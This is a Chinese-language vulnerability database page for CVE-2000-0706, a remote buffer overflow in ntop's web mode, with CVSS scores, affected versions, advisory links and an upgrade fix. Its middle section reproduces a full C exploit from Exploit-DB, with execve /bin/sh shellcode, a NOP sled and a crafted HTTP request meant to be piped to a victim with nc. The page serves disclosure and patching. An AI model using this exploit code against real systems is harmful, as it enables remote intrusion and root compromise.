CVE-2000-0706
CVSS10.0
发布时间 :2000-10-20 00:00:00
修订时间 :2008-09-10 15:05:40
NMCOE    

[原文]Buffer overflows in ntop running in web mode allows remote attackers to execute arbitrary commands.


[CNNVD]ntop缓冲区溢出漏洞(CNNVD-200010-076)

        web模式下运行的ntop存在缓冲区溢出漏洞。远程攻击者可以利用该漏洞执行任意代码。

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:luca_deri:ntop:1.2a7_9
cpe:/a:luca_deri:ntop:1.3.1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0706
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0706
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200010-076
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/1576
(VENDOR_ADVISORY)  BID  1576
http://www.debian.org/security/2000/20000830
(VENDOR_ADVISORY)  DEBIAN  20000830 ntop: Still remotely exploitable using buffer overflows
http://www.osvdb.org/1513
(UNKNOWN)  OSVDB  1513
ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-00:36.ntop.asc
(UNKNOWN)  FREEBSD  FreeBSD-SA-00:36

- 漏洞信息

ntop缓冲区溢出漏洞
危急 缓冲区溢出
2000-10-20 00:00:00 2005-05-02 00:00:00
远程  
        web模式下运行的ntop存在缓冲区溢出漏洞。远程攻击者可以利用该漏洞执行任意代码。

- 公告与补丁

        

- 漏洞信息 (20150)

Luca Deri ntop 1.2 a7-9/1.3.1 Buffer Overflow Vulnerability (EDBID:20150)
unix remote
2000-08-14 Verified
0 Anonymous
N/A [点击下载]
source: http://www.securityfocus.com/bid/1576/info


ntop is a network usage monitoring tool for unix systems. It can be invoked at the console or as a server daemon, presenting statistics information via http with the -w parameter. In this mode, it is vulnerable to a buffer overflow before the user connecting to it can be authenticated. If exploited, an attacker can gain remote access to the system with the priviliges ntop is executing with. 

It is interesting to note that setuid ntop drops priviliges before this can be exploited, but is installed on *BSD systems only executable by members of group wheel. This leads to the assumption that it may often be executed as root (since users in wheel typically have root access..), so despite the fact that it drops priviliges it can still yield remote root access for the attacker if exploited when run as root.


#include <stdio.h>
#include <string.h>


char shellcode[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

void usage()
{
 printf("NTOP ntop-1.2a1 -w mode command execution exploit.\n");
 printf("                                 mat@hacksware.com\n");
 printf("Usage : ./ntop-w-exp | nc victim port\n");
 exit(0);
}

void main( int argc, char *argv[] )
{
  int i,offset=-24;
#define CODE_LEN 240
#define NOP_LEN 50
  char code_buf[CODE_LEN];
  unsigned long esp=0xbedffb00;

  if(argc >= 2) offset = atoi(argv[1]);

  memset(code_buf,0x90,NOP_LEN); //insert NOP CODES
  memcpy(code_buf+NOP_LEN, shellcode, strlen(shellcode));
  for(i=strlen(shellcode)+NOP_LEN;i<=CODE_LEN;i+=4)
     *(long *)&code_buf[i]=(unsigned long)esp-offset;

  printf("GET /");
  for(i=0;i<CODE_LEN; i++)
  {
     putchar(code_buf[i]);
  }
  printf("\r\n\r\n");
}
		

- 漏洞信息

1513
ntop -w Option Filename Buffer Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public Third-party Verified

- 漏洞描述

A remote overflow exists in ntop when running in 'web server' (-w) mode. The program fails to validate input to the filename variable resulting in a buffer overflow. With a specially crafted request, an attacker can execute arbitrary code resulting in a loss of integrity.

- 时间线

2000-10-25 2000-08-14
2000-10-25 Unknow

- 解决方案

Upgrade to version 2.1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站